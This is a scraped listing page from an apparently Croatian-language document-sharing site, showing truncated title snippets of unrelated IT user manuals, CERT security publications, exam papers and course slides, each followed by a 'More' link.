NIAS Projekt e-građani KORISNIČKA UPUTA za aplikaciju NIAS Verzija 1.1 Zagreb, srpanj 2014. Projekt e-građani KORISNIČKA UPUTA za aplikaciju Verzija 1.1 Zagreb, srpanj 2014. Naslov: Opis: Korisnička uputa za aplikaciju Dokument sadrži upute korisnicima aplikacije u sustavu e-građani Ključne riječi:

Више

Smjernice za korištenje sustava online prijava Ukoliko imate pristupno korisničko ime i lozinku ili ste navedeno dobili nakon zahtjeva za otvaranje no

Smjernice za korištenje sustava online prijava Ukoliko imate pristupno korisničko ime i lozinku ili ste navedeno dobili nakon zahtjeva za otvaranje no Smjernice za korištenje sustava online prijava Ukoliko imate pristupno korisničko ime i lozinku ili ste navedeno dobili nakon zahtjeva za otvaranje novog korisničkog računa (poslati zahtjev na javnipoziv.opp@havc.hr

Више

Microsoft Word - CCERT-PUBDOC doc

Microsoft Word - CCERT-PUBDOC doc Analiza Password Safe programskog paketa CCERT-PUBDOC-2003-10-43 Sigurnosni problemi u računalnim programima i operativnim sustavima područje je na kojem CARNet CERT kontinuirano radi. Rezultat toga rada

Више

Često postavljana pitanja u programu OBRT 1. Kako napraviti uplatu u knjizi tražbina i obveza? 2. Kako odabrati mapu/disk za pohranu podataka? 3. Kako

Često postavljana pitanja u programu OBRT 1. Kako napraviti uplatu u knjizi tražbina i obveza? 2. Kako odabrati mapu/disk za pohranu podataka? 3. Kako Često postavljana pitanja u programu OBRT 1. Kako napraviti uplatu u knjizi tražbina i obveza? 2. Kako odabrati mapu/disk za pohranu podataka? 3. Kako instalirati (novi) finin certifikat? 4. Kako ispisati

Више

Slide 1

Slide 1 OSNOVNI POJMOVI Naredba je uputa računalu za obavljanje određene radnje. Program je niz naredbi razumljivih računalu koje rješavaju neki problem. Pisanje programa zovemo programiranje. Programski jezik

Више

Radionice, webinari i MOOC-ovi u sklopu projekta E-škole Radionica "E-učitelj suvremena nastava uz pomoć tehnologije" Trajanje: 5 sati Polaznici radio

Radionice, webinari i MOOC-ovi u sklopu projekta E-škole Radionica E-učitelj suvremena nastava uz pomoć tehnologije Trajanje: 5 sati Polaznici radio Radionice, webinari i MOOC-ovi u sklopu projekta E-škole Radionica "E-učitelj suvremena nastava uz pomoć tehnologije" Polaznici radionice: Nastavnici predmeta matematika, fizika, biologija i kemija, stručni

Више

eredar Sustav upravljanja prijavama odjelu komunalnog gospodarstva 1 UPUTE ZA KORIŠTENJE SUSTAVA 1. O eredar sustavu eredar je sustav upravljanja prij

eredar Sustav upravljanja prijavama odjelu komunalnog gospodarstva 1 UPUTE ZA KORIŠTENJE SUSTAVA 1. O eredar sustavu eredar je sustav upravljanja prij eredar Sustav upravljanja prijavama odjelu komunalnog gospodarstva 1 UPUTE ZA KORIŠTENJE SUSTAVA 1. O eredar sustavu eredar je sustav upravljanja prijavama koje građani mogu slati Upravnom odjelu za komunalno

Више

HxD CERT.hr-PUBDOC

HxD CERT.hr-PUBDOC HxD CERT.hr-PUBDOC-2019-3-376 Sadržaj 1 UVOD... 3 2 INSTALACIJA ALATA HXD... 4 3 KORIŠTENJE ALATA HXD... 9 3.1 SUČELJE HXD-A... 9 3.2 PREGLEDAVANJE DATOTEKA... 12 3.3 IZMJENA DATOTEKA... 13 3.4 SIGURNO

Више

Web programiranje i primjene - Osnovni pojmovi WEB tehnologije korišteni u kolegiju

Web programiranje i primjene - Osnovni pojmovi WEB tehnologije korišteni u kolegiju Osnovni pojmovi WEB tehnologije korišteni u kolegiju Ivan Vazler Odjel za matematiku Sveučilište u Osijeku 16. listopada 2013. WWW - World Wide Web World Wide Web (WWW) svjetska mreža računala s izvorima

Више

Državno natjecanje / Osnove informatike Srednje škole Zadaci U sljedećim pitanjima na odgovore odgovaraš upisivanjem slova koji se nalazi ispred

Državno natjecanje / Osnove informatike Srednje škole Zadaci U sljedećim pitanjima na odgovore odgovaraš upisivanjem slova koji se nalazi ispred Zadaci. 8. U sljedećim pitanjima na odgovore odgovaraš upisivanjem slova koji se nalazi ispred točnog odgovora, u za to predviđen prostor. Odgovor Ako želimo stvoriti i pohraniti sliku, ali tako da promjenom

Више

Sveučilište u Zagrebu Fakultet prometnih znanosti Zavod za inteligentne transportne sustave Katedra za primijenjeno računarstvo Vježba: #7 Kolegij: Ba

Sveučilište u Zagrebu Fakultet prometnih znanosti Zavod za inteligentne transportne sustave Katedra za primijenjeno računarstvo Vježba: #7 Kolegij: Ba Sveučilište u Zagrebu Fakultet prometnih znanosti Zavod za inteligentne transportne sustave Katedra za primijenjeno računarstvo Vježba: #7 Kolegij: Baze podataka Tema: Osnovna SELECT naredba Vježbu pripremili:

Више

AKD KID Middleware Upute za Macintosh instalaciju V1.0

AKD KID Middleware Upute za Macintosh instalaciju V1.0 AKD KID Middleware Upute za Macintosh instalaciju V1.0 Izdanje Datum Opis izmjene 1.0 06.04.2018. Inicijalna verzija dokumenta Sadržaj Instalacija... 2 Uklanjanje instalacije... 7 2.1 Uklanjanje instalacije

Више

O Nanokinetik NeeS TOC Builder-u NeeS TOC Builder je aplikacija koja se koristi za kreiranje Tabele sadržaja (TOC) za elektronske podneske u NeeS form

O Nanokinetik NeeS TOC Builder-u NeeS TOC Builder je aplikacija koja se koristi za kreiranje Tabele sadržaja (TOC) za elektronske podneske u NeeS form O Nanokinetik NeeS TOC Builder-u NeeS TOC Builder je aplikacija koja se koristi za kreiranje Tabele sadržaja (TOC) za elektronske podneske u NeeS formatu. Ključne pojedinosti Nanokinetik NeeS TOC Builder-a:

Више

UVJETI KORIŠTENJA INTERNETSKE STRANICE Korisnik posjetom web stranicama potvrđuje da je pročitao i da u cijelosti prihvaća o

UVJETI KORIŠTENJA INTERNETSKE STRANICE   Korisnik posjetom   web stranicama potvrđuje da je pročitao i da u cijelosti prihvaća o UVJETI KORIŠTENJA INTERNETSKE STRANICE WWW.TELE2.HR Korisnik posjetom www.tele2.hr web stranicama potvrđuje da je pročitao i da u cijelosti prihvaća ove Uvjete korištenja web stranice www.tele2.hr (dalje

Више

Microsoft Office Sway

Microsoft Office Sway Microsoft Office Sway Нови алат за израду презентација Милан Зец Доситеј LANACO LANACO приручник MICROSOFT OFFICE SWAY НОВИ АЛАТ ЗА ИЗРАДУ ПРЕЗЕНТАЦИЈА Copyright 2016 Умножавање, репродукција или на други

Више

SELECT statement basic form

SELECT statement basic form NAZIV OBJEKTA ZNANJA Uvod u JQuery PROLOG Autor * Katarina Kaplarski Klasifikacija * Težina * Osnovni nivo Ključne reči * Ko sluša * Student OAS Trajanje * Komentari autora SADRŽAJ Apstrakt Cilj * Uvodne

Више

ELFI: UPUTSTVO ZA KORIŠTENJE

ELFI: UPUTSTVO ZA KORIŠTENJE ELFI elearning sustav Uputstvo za instalaciju i korištenje Ivora škola informatike ELFI 2013 SADRŽAJ Sadržaj Poglavlje 1: Uvod... 2 1.1. ELFI... 2 1.2. Upute za instalaciju... 2 1.2.1. Sistemski zahtjevi

Више

RAČUNALO

RAČUNALO RAČUNALO HARDVER + SOFTVER RAČUNALO HARDVER strojna oprema računala tj. tvrdi, materijalni, opipljivi dijelovi računala kućište i sve komponente u njemu, vanjske jedinice SOFTVER neopipljivi dijelovi računala

Више

Microsoft Word - CCERT-PUBDOC doc

Microsoft Word - CCERT-PUBDOC doc Analiza Look@LAN programskog paketa CCERT-PUBDOC-2007-09-204 Sigurnosni problemi u računalnim programima i operativnim sustavima područje je na kojem CARNet CERT kontinuirano radi. Rezultat toga rada ovaj

Више

Slide 1

Slide 1 Kako jednostavnije preći na višu verziju Formsa Ivan Lovrić, Vedran Latin 14.10.2009. Sadržaj prezentacije Predmet migracije Razlozi za migraciju Infrastruktura potrebna za migraciju Pilot migracija Migracija

Више

KAKO POHRANITI SVOJ RAD U REPOZITORIJ

KAKO POHRANITI SVOJ RAD U REPOZITORIJ KAKO POHRANITI SVOJ RAD U REPOZITORIJ? POHRANJIVANJE ZAVRŠNIH I DIPLOMSKIH RADOVA Upute za studente Ove su upute rezultat rada članova Radne skupine za edukaciju i podršku sustava Dabar u sastavu: Ivana

Више

MultiBoot Korisnički priručnik

MultiBoot Korisnički priručnik MultiBoot Korisnički priručnik Autorsko pravo 2006., 2007. Hewlett- Packard Development Company, L.P. Informacije sadržane u ovom dokumentu podložne su promjenama bez najave. Jedina jamstva za HP-ove proizvode

Више

Poštovani,

Poštovani, Održavanje i korištenje informacijskih sustava Hrvatske vatrogasne zajednice Radni dokument Verzija 1.01 Lipanj 2019. Sadržaj 1. UVOD... 3 2. CILJ I SVRHA DOKUMENTA... 3 3. INFORMACIJSKI SUSTAVI I SPECIFIKACIJE

Више

Microsoft Word - CCERT-PUBDOC doc

Microsoft Word - CCERT-PUBDOC doc Analiza Stumbler/55808 trojanskog konja CCERT-PUBDOC-2003-07-31 Sigurnosni problemi u računalnim programima i operativnim sustavima područje je na kojem CARNet CERT kontinuirano radi. Rezultat toga rada

Више

Microsoft Word - Uputstvo za koristenje aplikacije GIPKO

Microsoft Word - Uputstvo za koristenje aplikacije GIPKO Aplikacija za elektronsko popunjavanje obrasca GIP-1022 i spašavanje podataka u datoteku u XML formatu GIPKO Verzija 1.2 Sadržaj Uvod... 3 Instalacija aplikacije... 4 Pokretanje aplikacije... 7 Meni aplikacije...

Више

Programiranje 2 popravni kolokvij, 15. lipnja Ime i prezime: JMBAG: Upute: Na kolokviju je dozvoljeno koristiti samo pribor za pisanje i brisanj

Programiranje 2 popravni kolokvij, 15. lipnja Ime i prezime: JMBAG: Upute: Na kolokviju je dozvoljeno koristiti samo pribor za pisanje i brisanj Upute: Na kolokviju je dozvoljeno koristiti samo pribor za pisanje i brisanje, te službeni šalabahter. Kalkulatori, mobiteli, razne neslužbene tablice, papiri i sl., nisu dozvoljeni! Sva rješenja napišite

Више

Microsoft PowerPoint - LB7-2_WCCF_2012.ppt

Microsoft PowerPoint - LB7-2_WCCF_2012.ppt Praktikum automatizacije ak.g. 2011/2012 Laboratorijski blok 7 (Interaktivna vježba) LB7-2 Konfiguracija sučelja čovjek-stroj na operaterskom panelu unutar programskog paketa Step7 WinCC Flexible Četvrtak,

Више

Test ispravio: (1) (2) Ukupan broj bodova: 21. veljače od 13:00 do 14:00 Županijsko natjecanje / Osnove informatike Osnovne škole Ime i prezime

Test ispravio: (1) (2) Ukupan broj bodova: 21. veljače od 13:00 do 14:00 Županijsko natjecanje / Osnove informatike Osnovne škole Ime i prezime Test ispravio: () () Ukupan broj bodova:. veljače 04. od 3:00 do 4:00 Ime i prezime Razred Škola Županija Mentor Sadržaj Upute za natjecatelje... Zadaci... Upute za natjecatelje Vrijeme pisanja: 60 minuta

Више

Prikaz slike na monitoru i pisaču

Prikaz slike na monitoru i pisaču CRT monitori s katodnom cijevi i LCD monitori na bazi tekućih kristala koji su gotovo istisnuli iz upotrebe prethodno navedene. LED monitori- Light Emitting Diode, zasniva se na elektrodama i diodama koje

Више

eOI Middleware Upute za instalaciju

eOI Middleware Upute za instalaciju AKD eid Middleware Upute za Windows instalaciju V1.1 www.id.hr Izdanje Datum Opis izmjene 1.0 09.06.2017. Inicijalna verzija dokumenta. 1.1 30.08.2018. Izmjena vizualnog identiteta Sadržaj Instalacija...

Више

Microsoft PowerPoint - LB7-2_WCCF_2010.ppt

Microsoft PowerPoint - LB7-2_WCCF_2010.ppt WinCC flexible alat za konfiguriranje HMI na operaterskom panelu Praktikum automatizacije LB7-2 Pregled predavanja WinCC flexible izgled, organizacija, princip rada Primjer Praktikum automatizacije --

Више

Podružnica za građenje

Podružnica za građenje Dodatak A OPIS USLUGA DODATAK A-1 PROJEKTNI ZADATAK Revizija scenarija i algoritama Regionalnih centara za nadzor i upravljanje prometom na autocestama Zagreb, srpanj 2019. 1. Uvod Sve veći porast prometa

Више

VALIDNOST CERTIFIKATA ZA PRISTUP INTERNET APLIKACIJAMA POREZNE UPRAVE FEDERACIJE BOSNE I HERCEGOVINE (npis I ejs)

VALIDNOST CERTIFIKATA ZA PRISTUP INTERNET APLIKACIJAMA POREZNE UPRAVE FEDERACIJE BOSNE I HERCEGOVINE (npis I ejs) VALIDNOST CERTIFIKATA ZA PRISTUP INTERNET APLIKACIJAMA POREZNE UPRAVE FEDERACIJE BOSNE I HERCEGOVINE (NPIS I EJS) POREZNA UPRAVA FEDERACIJE BOSNE I HERCEGOVINE Sektor za informacione tehnologije Sarajevo,

Више

Signal NCERT-PUBDOC

Signal NCERT-PUBDOC Signal NCERT-PUBDOC-2018-4-359 Sadržaj 1 UVOD... 3 2 INSTALACIJA APLIKACIJE SIGNAL... 4 3 KORIŠTENJE APLIKACIJE SIGNAL... 8 3.1 SLANJE PORUKA... 8 3.2 NESTAJUĆE PORUKE... 10 3.3 PROVJERA SIGURNOSNOG BROJA...

Више

Računarski softver Da bi računarski sistem mogao da radi, pored hardvera mora biti opremljen i odgovarajućim programima koji će njime upravljati.ova k

Računarski softver Da bi računarski sistem mogao da radi, pored hardvera mora biti opremljen i odgovarajućim programima koji će njime upravljati.ova k Računarski softver Da bi računarski sistem mogao da radi, pored hardvera mora biti opremljen i odgovarajućim programima koji će njime upravljati.ova komponenta računarskog sistema se zove SOFTVER(software

Више

Prikaz znakova u računalu

Prikaz znakova u računalu PRIKAZ ZNAKOVA U RAČUNALU Načini kodiranja ASCII 1 znak 7 bitova Prošireni ASCII 1 znak 8 bitova (1B) UNICODE 1 znak 16 bitova (2B) ZADATCI S MATURE ljetni rok, 2014., zadatak 11 Koliko se različitih znakova

Више

Kriteriji ocjenjivanja 6razred

Kriteriji ocjenjivanja 6razred Kriteriji ocjenjivanja 6razred Nastavne cjeline: 1. Obrada teksta 2. Računalne mreže 3. Internet 4. Multimediji 5. Izrada prezentacija 12 Nastavna cjelina: OBRADA TEKSTA Dobar (3) Dovoljan (2). prepoznaje

Више

Računarski praktikum I - Vježbe 01 - Uvod

Računarski praktikum I - Vježbe 01 - Uvod Prirodoslovno-matematički fakultet Matematički odsjek Sveučilište u Zagrebu RAČUNARSKI PRAKTIKUM I Vježbe 01 - Uvod v2018/2019. Sastavio: Zvonimir Bujanović Gradivo i način polaganja Gradivo: osnove jezika

Више

Microsoft Word - InveoP_01.docx

Microsoft Word - InveoP_01.docx 0 INVEO-P Inveo-P je jedinstveno rješenje na tržištu razvijeno upravo za paušalne obrte i jedino koje paušalnim obrtima omogućava potpuni pregled poslovanja. Razvijen je kao integrirano poslovno rješenje

Више

WAMSTER Prezentacija

WAMSTER Prezentacija WAMSTER Mi smo Studio Elektronike Rijeka d.o.o. tvrtka za razvoj tehnoloških rješenja u automatici i elektronici tvrka osnovana 2006. na temelju komercijalizacije rezultata magistarskog rada locirani u

Више

Upute - JOPPD kreiranje obrasca

Upute - JOPPD kreiranje obrasca Verzija uputa: 1.0 - JOPPD obrazac IPIS-PLAĆE, IPIS-UGOVORI O DJELU Ove upute će se još nadopunjavati, pa molim korisnike da redovito provjere da li imaju zadnje upute. Verzija uputa prikazana je na početku!

Више

Slide 1

Slide 1 Roland Miklid Patrik Frankovid Zoran Frlan HEP d.d. Sektor za informatiku i telekomunikacije Sadržaj Uvod O projektu i njegovim fazama Oracle Forms & Reports Web servisi & B2B WebLogic BI Publisher Flex

Више

Pravilnik o načinu i uvjetima sprječavanja i suzbijanja zlouporaba i prijevara u pružanju usluga elektroničke pošte

Pravilnik o načinu i uvjetima sprječavanja i suzbijanja zlouporaba i prijevara u pružanju usluga elektroničke pošte HRVATSKA AGENCIJA ZA POŠTU I ELEKTRONIČKE KOMUNIKACIJE Temeljem članka 12. stavka 1. i članka 107. stavka 12. Zakona o elektroničkim komunikacijama (»Narodne novine«br. 73/08), Vijeće Hrvatske agencije

Више

Biz web hosting

Biz web hosting BIZ WEB HOSTING KORISNIČKO UPUTSTVO WWW.OBLACI.RS SADRŽAJ PRISTUP KORISNIČKOM PORTALU... 2 KUPOVINA BIZ WEB HOSTING SERVISA... 4 PRISTUP PLESK WEB KONTROLNOM PANELU... 14 PORTALI I DOMENI... 14 FAJL MENADŽER...

Више

Microsoft Word - IP_Tables_programski_alat.doc

Microsoft Word - IP_Tables_programski_alat.doc 1. IP Tables alat (pregled naredbi) 1.1. Osnovne IP Tables naredbe za filtriranje paketa U ovom poglavlju opisane su osnovne IP Tables naredbe korištene za filtriranje paketa. S programskim paketom IP

Више

Microsoft Word - Odluka o izmjeni dokumentacije o jednostavnoj nabavi.rtf

Microsoft Word - Odluka o izmjeni dokumentacije o jednostavnoj nabavi.rtf Na temelju Članka 200. stavak 6. Zakona o javnoj nabavi ( Narodne novine, br. 120/16) i Odluke o pravilima, uvjetima i postupcima nabave roba, usluga i radova u Energetskom institutu Hrvoje Požar: ODL-18-00393/1

Више

Document ID / Revision : 0419/1.1 ID Issuer Sustav (sustav izdavatelja identifikacijskih oznaka) Upute za registraciju gospodarskih subjekata

Document ID / Revision : 0419/1.1 ID Issuer Sustav (sustav izdavatelja identifikacijskih oznaka) Upute za registraciju gospodarskih subjekata ID Issuer Sustav (sustav izdavatelja identifikacijskih oznaka) Upute za registraciju gospodarskih subjekata Gospodarski subjekti Definicija: U skladu s Direktivom 2014/40/EU gospodarski subjekt svaka

Више

Sveučilište u Zagrebu

Sveučilište u Zagrebu SVEUČILIŠTE U ZAGREBU FAKULTET ELEKTROTEHNIKE I RAČUNARSTVA RAČUNALNA FORENZIKA SEMINAR VoIP enkripcija Ivan Laznibat Zagreb, siječanj, 2017. Sadržaj 1. Uvod... 1 2. VoIP enkripcija... 3 2.1 PKI (eng.

Више

Microsoft PowerPoint - Rittal konfigurator 2019_prezentacija__HR

Microsoft PowerPoint - Rittal konfigurator 2019_prezentacija__HR Rittal Configuration System Online konfigurator za Rittalove ormare PM-M N. Treml 19.07.2018 1 Jednostavnost konfiguracije Odaberite sustav Samostalni ormar, sustav ormara, različite dimenzije Konfigurirajte

Више

WordPress & CSP Polisa Sigurnosti Sadržaja za WordPress Milan Petrović WordCamp Niš

WordPress & CSP Polisa Sigurnosti Sadržaja za WordPress Milan Petrović WordCamp Niš WordPress & CSP Polisa Sigurnosti Sadržaja za WordPress Milan Petrović 18.5.2019. WordCamp Niš Predavanje, Google Docs: https://d4p.me/wordcampnis HTTP Zaglavlja Svaki HTTP odgovor počinje zaglavljima

Више

Lorem ipsum dolor sit amet lorem ipsum dolor

Lorem ipsum dolor sit  amet lorem ipsum dolor Početna prezentacija za korisnike Ključna aktivnost 1: Mobilnost u svrhu učenja: Razmjene mladih i Mobilnost osoba koje rade s mladima Završno izvješće Mobility tool Projektni ciklus Završno izvješće 1.

Више

Generated by Foxit PDF Creator Foxit Software For evaluation only. Operativni sistem U računarstvu, operativni sistem (OS

Generated by Foxit PDF Creator Foxit Software   For evaluation only. Operativni sistem U računarstvu, operativni sistem (OS Operativni sistem U računarstvu, operativni sistem (OS) je kompleksan programski sistem koji kontroliše i upravlja uređajima i računarskim komponentama i obavljanje osnovne sistemske radnje. Operativni

Више

COMARC/A Format

COMARC/A Format COMARC/A 856 856 ELEKTRONSKA LOKACIJA I PRISTUP Polje možemo da koristimo u normativnim zapisima za obezbeđivanje dodatnih (elektronskih) informacija o entitetu za koji je zapis kreiran. Polje sadrži podatke

Више

INTEGRIRANI KNJIŽNIČNI SUSTAV Sustav za podršku Upute za instalaciju: Aleph v22 ZAG

INTEGRIRANI KNJIŽNIČNI SUSTAV Sustav za podršku Upute za instalaciju: Aleph v22 ZAG INTEGRIRANI KNJIŽNIČNI SUSTAV Sustav za podršku Upute za instalaciju: Aleph v22 ZAG INTEGIRANI KNJIŽNIČNI SUSTAV Upute za instalaciju: Aleph v22 ZAG Nacionalna i sveučilišna knjižnica u Zagrebu Ul. Hrvatske

Више

UPUTA za uvođenje JOPPD - prva faza

UPUTA za uvođenje JOPPD - prva faza UPUTA ZA UVOĐENJE OBRASCA JOPPD PRVA FAZA Prva faza uvođenja obrasca JOPPD uključuje slijedeće aktivnosti: 1. Instalacija nove verzije 2. Punjenje šifarnika potrebnih za JOPPD obrazac a. Oznake stjecatelja

Више

Korisničke upute za podnošenje zahtjeva za rješavanje spora (žalbe)

Korisničke upute za podnošenje zahtjeva za rješavanje spora (žalbe) Korisničke upute Verzija 2.0 HRVATSKA REGULATORNA AGENCIJA ZA MREŽNE DJELATNOSTI Roberta Frangeša Mihanovića 9, 10000 Zagreb / OIB: 87950783661 / Tel: (01) 7007 007, Fax: (01) 7007 070 / www.hakom.hr Sadržaj

Више

INDIKATOR SVJETLA FUNKCIJE TIPKI 1. Prikazuje se temperatura i parametri upravljanja 2. Crveno svjetlo svijetli kad grijalica grije 3. Indikator zelen

INDIKATOR SVJETLA FUNKCIJE TIPKI 1. Prikazuje se temperatura i parametri upravljanja 2. Crveno svjetlo svijetli kad grijalica grije 3. Indikator zelen INDIKATOR SVJETLA FUNKCIJE TIPKI 1. Prikazuje se temperatura i parametri upravljanja 2. Crveno svjetlo svijetli kad grijalica grije 3. Indikator zelenog svjetla koji prikazuje sniženu temperaturu. Uključuje

Више

don't be evil Dobrica Pavlinušić Kako u nestrukturiranom svijetu naći nestrukturirane informacije? Th

don't be evil Dobrica Pavlinušić   Kako u nestrukturiranom svijetu naći nestrukturirane informacije? Th don't be evil Dobrica Pavlinušić dpavlin@rot13.org http://www.rot13.org/~dpavlin/ Kako u nestrukturiranom svijetu naći nestrukturirane informacije? This presentation is made without any affiliation with

Више

Универзитет у Београду Универзитетска библиотека Светозар Марковић Извори у отвореном приступу, е- књиге и цитатни менаџер Дејана Каваја Станишић kava

Универзитет у Београду Универзитетска библиотека Светозар Марковић Извори у отвореном приступу, е- књиге и цитатни менаџер Дејана Каваја Станишић kava Универзитет у Београду Универзитетска библиотека Светозар Марковић Извори у отвореном приступу, е- књиге и цитатни менаџер Дејана Каваја Станишић kavaja@unilib.bg.ac.rs О чему ћемо говорити О електронским

Више

Smjernice za korištenje HAVC portala Modul AV djela 1

Smjernice za korištenje HAVC portala Modul AV djela 1 Smjernice za korištenje HAVC portala Modul AV djela 1 Sadržaj Često postavljena pitanja (ČPP)... 3 1. Pregled i unos AV djela... 4 2. Pravila za unos AV djela... 6 Produkcijska kuća (Glavni producent)...

Више

JMBAG Ime i Prezime Mreže računala Završni ispit 16. veljače Na kolokviju je dozvoljeno koristiti samo pribor za pisanje i službeni šalabahter.

JMBAG Ime i Prezime Mreže računala Završni ispit 16. veljače Na kolokviju je dozvoljeno koristiti samo pribor za pisanje i službeni šalabahter. Mreže računala Završni ispit Na kolokviju je dozvoljeno koristiti samo pribor za pisanje i službeni šalabahter. Predajete samo papire koje ste dobili. Rezultati, uvid u ispit i upis ocjena:... Zadatak

Више

E-RAČUN ZA POSLOVNE SUBJEKTE ZAPRIMANJE I SLANJE E-RAČUNA JE LAKO, PROVJERITE U FINI KAKO...

E-RAČUN ZA POSLOVNE SUBJEKTE ZAPRIMANJE I SLANJE E-RAČUNA JE LAKO, PROVJERITE U FINI KAKO... ZA POSLOVNE SUBJEKTE ZAPRIMANJE I SLANJE A JE LAKO, PROVJERITE U FINI KAKO... 2 ZA POSLOVNE SUBJEKTE Servis e-račun je internetski servis za elektroničku razmjenu računa između poslovnih subjekata (dobavljača

Више

Inženjering informacionih sistema

Inženjering informacionih sistema Fakultet tehničkih nauka, Novi Sad Inženjering informacionih sistema Dr Ivan Luković Dr Slavica Kordić Nikola Obrenović Milanka Bjelica Dr Jelena Borocki Dr Milan Delić UML UML (Unified Modeling Language)

Више

CARNET Webmail Upute za korištenje

CARNET Webmail   Upute za korištenje CARNET Webmail https://webmail.carnet.hr Upute za korištenje Sadržaj O Webmailu... 2 Prijava u sustav... 3 Korisničko sučelje... 5 Nova poruka... 5 Pregled poštanskog sandučića... 8 Pregled sadržaja poruke...

Више

ZAVOD ZA ELEKTRONIKU, MIKROELEKTRONIKU, RAČUNALNE I INTELIGENTNE SUSTAVE FAKULTET ELEKTROTEHNIKE I RAČUNARSTVA SVEUČILIŠTE U ZAGREBU NAZIV SEMINARA au

ZAVOD ZA ELEKTRONIKU, MIKROELEKTRONIKU, RAČUNALNE I INTELIGENTNE SUSTAVE FAKULTET ELEKTROTEHNIKE I RAČUNARSTVA SVEUČILIŠTE U ZAGREBU NAZIV SEMINARA au ZAVOD ZA ELEKTRONIKU, MIKROELEKTRONIKU, RAČUNALNE I INTELIGENTNE SUSTAVE FAKULTET ELEKTROTEHNIKE I RAČUNARSTVA SVEUČILIŠTE U ZAGREBU NAZIV SEMINARA autori seminara, imena i prezimena SEMINARSKI RAD IZ

Више

KATALOG ZNANJA IZ INFORMATIKE

KATALOG ZNANJA IZ INFORMATIKE KATALOG ZNANJA IZ INFORMATIKE Nacionalni savjet za obrazovanje je na 27. sjednici održanoj 17. marta 2014. godine utvrdio izmjene predmetnoga programa INFORMATIKA za I razred gimnazije. Na zahtijev Pedagoško-psihološke

Више

(Microsoft Word - S1-MTS-Primjena ra\350unala u poslovnoj praksi -Breslauer N)

(Microsoft Word - S1-MTS-Primjena ra\350unala u poslovnoj praksi -Breslauer N) 1. OPĆE INFORMACIJE 1.1. Naziv kolegija Primjena računala u poslovnoj praksi 1.6. Semestar 1 1.. Nositelj kolegija Nenad Breslauer, v. pred. 1.7. Bodovna vrijednost (ECTS) 5 1.3. Suradnici 1.8. Način izvođenja

Више

Програмирај!

Програмирај! Листе Поред појединачних вредности исказаних бројем или ниском карактера, често је потребно забележити већи скуп вредности које су на неки начин повезане, као, на пример, имена у списку путника у неком

Више

LISTOPAD DRUGO IZDANJE ZAŠTITITE PRIVATNOST NA FACEBOOKU Saznajte o opasnostima kojima se izlažete prilikom postavljanja osobnih podataka i sadr

LISTOPAD DRUGO IZDANJE ZAŠTITITE PRIVATNOST NA FACEBOOKU Saznajte o opasnostima kojima se izlažete prilikom postavljanja osobnih podataka i sadr LISTOPAD 2014. DRUGO IZDANJE ZAŠTITITE PRIVATNOST NA FACEBOOKU Saznajte o opasnostima kojima se izlažete prilikom postavljanja osobnih podataka i sadržaja na najpopularniju društvenu mrežu te kako podesiti

Више

Microsoft PowerPoint - Programski_Jezik_C_Organizacija_Izvornog_Programa_I_Greske [Compatibility Mode]

Microsoft PowerPoint - Programski_Jezik_C_Organizacija_Izvornog_Programa_I_Greske [Compatibility Mode] Programski jezik C organizacija izvornog programa Prevođenje Pisanje programa izvorni program Prevođenje programa izvršni program Izvršavanje programa rezultat Faze prevođenja Pretprocesiranje Kompilacija

Више

VODIČ ZA MODERNIJE POSLOVANJE CLOUD STORAGE Privatna učilišta i škole stranih jezika prelaze u cloud

VODIČ ZA MODERNIJE POSLOVANJE CLOUD STORAGE Privatna učilišta i škole stranih jezika prelaze u cloud VODIČ ZA MODERNIJE POSLOVANJE CLOUD STORAGE Privatna učilišta i škole stranih jezika prelaze u cloud 01 Privatna učilišta i škole stranih jezika prelaze u cloud: polaznici imaju sve materijale za učenje

Више

УПУТСТВО ЗА АУТОРЕ Радови се предају на начин и у формату који је доле прописан. Дужина текста је максимално до два ауторска табака (или до знак

УПУТСТВО ЗА АУТОРЕ Радови се предају на начин и у формату који је доле прописан. Дужина текста је максимално до два ауторска табака (или до знак УПУТСТВО ЗА АУТОРЕ Радови се предају на начин и у формату који је доле прописан. Дужина текста је максимално до два ауторска табака (или до 57600 знакова- Characters with spаces), укључујући наслове, апстракте,

Више

PowerPointova prezentacija

PowerPointova prezentacija ŽSV učitelja/nastavnika informatike Ličko-senjske županije Otočac, 19. studenog 2011. Ivanka Kranjčević-Orešković Sustav upravljanja kolegijima (Course Management System - CMS) otvorenoga koda (pod GNU

Више

Fra Serafina Schoena Rijeka MB: MBO: Žiro račun: kod RBA d.d. GSM:

Fra Serafina Schoena Rijeka MB: MBO: Žiro račun: kod RBA d.d. GSM: EKLIPS MINI CMS upute za korištenje v1.0 1. Sadržaj isporuke i opće informacije EKLIPS MINI CMS sustav napravljen je pomoću sljedećih open source tehnologija Java JDK 1.5 - http://java.sun.com/javase/downloads/index_jdk5.jsp

Више

POSLOVNA INTELIGENCIJA I ANALITIKA ZA PRAVE POSLOVNE ODLUKE

POSLOVNA INTELIGENCIJA I ANALITIKA ZA PRAVE POSLOVNE ODLUKE POSLOVNA INTELIGENCIJA I ANALITIKA ZA PRAVE POSLOVNE ODLUKE Qlik Sense Family - najbolja platforma za poslovnu inteligenciju Kreiranje prilagodljivih i interaktivnih vizualizacija nikada nije bilo tako

Више

СТАРТ - СТОП ПАРКИНГ СИСТЕМ КОРИСНИЧКО УПУТСТВО страна 1 од 12

СТАРТ - СТОП ПАРКИНГ СИСТЕМ КОРИСНИЧКО УПУТСТВО страна 1 од 12 СТАРТ - СТОП ПАРКИНГ СИСТЕМ КОРИСНИЧКО УПУТСТВО страна 1 од 12 РЕГИСТРАЦИЈА НА СТАРТ-СТОП ПАРКИНГ СИСТЕМ За коришћење СТАРТ-СТОП ПАРКИНГ система, корисник (физичко или правно лице) попуњава упитник у просторијама

Више

Ime i prezime učenika

Ime i prezime učenika UPUTE ZA KORIŠTENJE TABLETA GIMNAZIJA ŽUPANJA VELIKI KRAJ 42, ŽUPANJA Škola za život U sklopu eksperimentalnog programa Škola za život, čiji je nositelj Ministarstvo znanosti i obrazovanja, svaki učenik

Више

Rad u mrežnom okruženju Osnove informatike s primjenom računala

Rad u mrežnom okruženju Osnove informatike s primjenom računala Rad u mrežnom okruženju DHCP 1/2 DHCP (Dynamic Host Configuration Protocol) je mrežni protokol koji omogućava automatiziranu dodjelu IP adresa računalu prema parametrima kao što su: mrežna maska koja će

Више

** Osnovni meni

** Osnovni meni Instalacija serverske verzije Kataloga propisa Instalacija Kataloga propisa se vrši na sljedeći način: 1. Ubacite Instalacioni disk ili USB memoriju u računar. 2. Instalacioni program će se automatski

Више

Microsoft PowerPoint - PRI2014 KORIGOVANO [Compatibility Mode]

